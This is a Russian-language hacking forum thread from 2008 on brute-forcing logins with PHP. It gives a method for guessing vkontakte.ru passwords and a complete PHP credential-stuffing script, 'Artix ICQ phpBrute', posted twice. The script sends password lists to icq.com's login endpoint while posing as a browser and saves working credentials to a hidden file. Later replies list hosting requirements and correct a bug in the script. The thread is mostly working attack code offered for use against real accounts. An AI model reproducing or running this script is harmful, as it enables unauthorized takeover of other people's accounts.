Брут с помощью php.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Брут с помощью php. - 2008-09-25 15:51:07.216666
|
|
|
DzumoHu4
Сообщений: 279
Оценки: 0
Присоединился: 2008-08-04 19:04:43.236666
|
Вот задался вопросом брута с помощью пхп.Есть ли готовые скрипты для брута, форм авторизации на других скажем сайтах.Или брут фтп.?
|
|
|
|
|
RE: Брут с помощью php. - 2008-09-25 21:45:09.166666
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Всё просто: допустим брутим vkontacte.ru.
при помощи сокетов посылаем запрос на чтение страницы
где надо ввести логин и пароль.
потом ищем в полученной странице фразу "пароль не верный".
если эта фраза найдена, то пробудем следующий пароль.
если не найдена, значит пароль найден.
|
|
|
|
|
RE: Брут с помощью php. - 2008-09-25 22:39:24.250000
|
|
|
postal134
Сообщений: 1006
Оценки: 25
Присоединился: 2008-03-16 11:55:15.150000
|
icq brute-force
quote:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Artix ICQ phpBrute</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<bоdу>
<?
///Для того, чтбы скрипт бесконечно работал
set_time_limit(0);
ignore_user_abort(1);
///Чтобы все ошибки показывал
Error_Reporting(E_ALL & ~E_NOTICE);
///Константы, просьба не менять
$config=array();
$config['good']='./.htgood.txt'; ///Складывать хорошие номера суда(рекомендую приставку .ht, тогда файл нельзя будет из веб прочитать)
$config['pass']='./pass.txt'; ///Лист паролей
$config['separator']=';'; /// Разделитель уин;pass
$config['host']='www.icq.com'; /// HTTP сервер мирабов
$config['port']=80; /// HTTP порт
$config['statfile']='./stat.html'; ///Служебный файл
///Если брутер запущен, то выдаем результат работы
if(file_exists($config['statfile']))
{
include($config['statfile']);
echo '
</bоdу>
</html>';
exit();
}
///Типа притворяемся браузером
$request = "POST /karma/login.php HTTP/1.1\r\n";
$request .= "Host: ".$config['host']." \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "rulez\r\n";
$request .= "$request .= "Connection: keep-alive\r\n";
$request .= "Referer: http://yandex.ru/ \r\n";
///Плохие и хорошие уины
$goodcount=0;
$badcount=0;
///Открытие файла с паролями
$pass=file($config['pass']);
///Непосредственно брут
for($i=0;$i<count($pass);$i++)
{
list($s,$s1)=explode($config['separator'],$pass[$i]);
///Данные для отправки к мирабам
$posts = array ( 'dest' => '/whitepages/user_details.php',
'desc' => '',
'service' => '20',
'css'=> 'whitepages',
'uin_email'=> $s,
'password' => trim($s1)
);
$postValues="";
$s='';
///Кодирование
foreach( $posts AS $name => $value )
{
$postValues .= urlencode($name) . "=" . urlencode($value) . '&';
}
///Создаем post запрос
$lenght = strlen($postValues);
$request2 = $request."Content-Type: application/x-www-form-urlencoded\r\n";
$request2 .= "Content-Length: $lenght\r\n";
$request2 .= "\r\n";
$request2 .= $postValues;
///Открываем сокет
$fp = fsockopen($config['host'],$config['port'], $errno, $errstr, 30);
if (!$fp)
{
///На случай ошибки
echo "$errstr ($errno)<br />\n";
}
else
{
///Отправляем данные на whitepages
fwrite($fp, $request2);
while (!feof($fp))
{
$s.=fgets($fp, 128);
}
}
///Закрываем сокет
fclose($fp);
///Если аська залогинилась, то whitepages посылает куки, которые мы и ловим. Всю страницу мы не скачиваем
if(strpos($s,'Set-C*****')==true)
{
$good=fopen($config['good'],'a');
fwrite($good,$pass[$i]);
fclose($good);
$goodcount++;
}
else $badcount++;
if($i%10==0)
{
$count=count($pass)-$i;
///Обновление статистики
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Осталось: $count<br>
---<br>
HTML;
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
}
}
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Работа завершена. <br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Для продолжения, удалите файл со статистикой<br>
---<br>
HTML;
///Запись конечного результата в файл
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
///Брут завершен
?>
|
|
|
|
|
RE: Брут с помощью php. - 2008-09-26 00:13:48.973333
|
|
|
DzumoHu4
Сообщений: 279
Оценки: 0
Присоединился: 2008-08-04 19:04:43.236666
|
quote:
ORIGINAL: lovop
Всё просто: допустим брутим vkontacte.ru.
при помощи сокетов посылаем запрос на чтение страницы
где надо ввести логин и пароль.
потом ищем в полученной странице фразу "пароль не верный".
если эта фраза найдена, то пробудем следующий пароль.
если не найдена, значит пароль найден.
quote:
ORIGINAL: postal134
icq brute-force
quote:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Artix ICQ phpBrute</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<bоdу>
<?
///Для того, чтбы скрипт бесконечно работал
set_time_limit(0);
ignore_user_abort(1);
///Чтобы все ошибки показывал
Error_Reporting(E_ALL & ~E_NOTICE);
///Константы, просьба не менять
$config=array();
$config['good']='./.htgood.txt'; ///Складывать хорошие номера суда(рекомендую приставку .ht, тогда файл нельзя будет из веб прочитать)
$config['pass']='./pass.txt'; ///Лист паролей
$config['separator']=';'; /// Разделитель уин;pass
$config['host']='www.icq.com'; /// HTTP сервер мирабов
$config['port']=80; /// HTTP порт
$config['statfile']='./stat.html'; ///Служебный файл
///Если брутер запущен, то выдаем результат работы
if(file_exists($config['statfile']))
{
include($config['statfile']);
echo '
</bоdу>
</html>';
exit();
}
///Типа притворяемся браузером
$request = "POST /karma/login.php HTTP/1.1\r\n";
$request .= "Host: ".$config['host']." \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "rulez\r\n";
$request .= "$request .= "Connection: keep-alive\r\n";
$request .= "Referer: http://yandex.ru/ \r\n";
///Плохие и хорошие уины
$goodcount=0;
$badcount=0;
///Открытие файла с паролями
$pass=file($config['pass']);
///Непосредственно брут
for($i=0;$i<count($pass);$i++)
{
list($s,$s1)=explode($config['separator'],$pass[$i]);
///Данные для отправки к мирабам
$posts = array ( 'dest' => '/whitepages/user_details.php',
'desc' => '',
'service' => '20',
'css'=> 'whitepages',
'uin_email'=> $s,
'password' => trim($s1)
);
$postValues="";
$s='';
///Кодирование
foreach( $posts AS $name => $value )
{
$postValues .= urlencode($name) . "=" . urlencode($value) . '&';
}
///Создаем post запрос
$lenght = strlen($postValues);
$request2 = $request."Content-Type: application/x-www-form-urlencoded\r\n";
$request2 .= "Content-Length: $lenght\r\n";
$request2 .= "\r\n";
$request2 .= $postValues;
///Открываем сокет
$fp = fsockopen($config['host'],$config['port'], $errno, $errstr, 30);
if (!$fp)
{
///На случай ошибки
echo "$errstr ($errno)<br />\n";
}
else
{
///Отправляем данные на whitepages
fwrite($fp, $request2);
while (!feof($fp))
{
$s.=fgets($fp, 128);
}
}
///Закрываем сокет
fclose($fp);
///Если аська залогинилась, то whitepages посылает куки, которые мы и ловим. Всю страницу мы не скачиваем
if(strpos($s,'Set-C*****')==true)
{
$good=fopen($config['good'],'a');
fwrite($good,$pass[$i]);
fclose($good);
$goodcount++;
}
else $badcount++;
if($i%10==0)
{
$count=count($pass)-$i;
///Обновление статистики
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Осталось: $count<br>
---<br>
HTML;
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
}
}
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Работа завершена. <br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Для продолжения, удалите файл со статистикой<br>
---<br>
HTML;
///Запись конечного результата в файл
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
///Брут завершен
?>
В общем насчёт FTP я загнул)А вот формы авторизации ближе к истине.Сопутствующий вопрос что должен уметь хостинг ? ну какими параметрами должна обладать хостинговая машина.
|
|
|
|
|
RE: Брут с помощью php. - 2008-10-08 16:50:29.446666
|
|
|
lovop
Сообщений: 37
Оценки: 0
Присоединился: 2008-07-19 01:40:51.390000
|
Параметры хостинговой машины:
-поддержка сокетов в php
-возможность использования set_time_limit (чтобы была разрешена эта функция)
|
|
|
|
|
RE: Брут с помощью php. - 2008-10-08 17:23:47.986666
|
|
|
himi
Сообщений: 1
Оценки: 0
Присоединился: 2008-10-08 03:26:33.546666
|
в асику бруте
$request .= "$request .= "Connection: keep-alive\r\n";
наверное просто
$request .= "Connection: keep-alive\r\n";
?
|
|
|
|
|
|
